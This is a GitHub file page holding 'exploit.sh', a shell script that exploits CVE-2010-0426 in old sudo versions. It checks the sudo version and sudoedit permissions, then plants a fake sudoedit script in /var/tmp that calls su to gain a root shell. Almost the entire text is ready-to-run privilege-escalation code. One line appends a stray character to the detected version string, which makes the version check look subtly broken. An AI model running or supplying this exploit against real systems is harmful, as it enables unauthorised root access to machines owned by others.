-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.sh
30 lines (23 loc) · 1.02 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
# CVE-2010-0426: sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Privilege escalation with sudo and sudoedit
# by g1vi https://github.com/g1vi
# February 2023
affected_versions='1.6,1.6.1,1.6.2,1.6.3p1,1.6.3p4,1.6.3p6,1.6.3p2,1.6.3p5,1.6.3p7,1.6.3p3,1.6.3,1.6.4p1,1.6.4p2,1.6.5p1,1.6.5p2,1.6.7p5,1.6.8p1,1.6.8p2,1.6.8p5,1.6.8p9,1.6.8p7,1.6.8p8,1.6.8p12,1.6.9p18,1.6.9p19,1.6.9p17,1.7.0,1.7.1,1.7.2p1,1.7.2p2,1.7.2p3,1.7.2'
sudo_version=$(sudo -V | grep "Sudo version" | cut -d" " -f3)i
sudo_version_match=$(echo $affected_versions | grep $sudo_version)
executable_file=$(sudo -l | grep sudoedit | cut -d":" -f 2 | awk -F " " '{print $2}')
if [ -z $sudo_version_match ] && [ -z $executable_file ]
then
echo "[-] Target is not vulnerable"
else
echo "[+] Target is vulnerable"
echo "[+] Running stuff..."
cat > /var/tmp/sudoedit << _EOF
#!/bin/sh
su
/bin/su
/usr/bin/su
_EOF
chmod a+x /var/tmp/sudoedit
sudo /var/tmp/sudoedit $executable_file
fi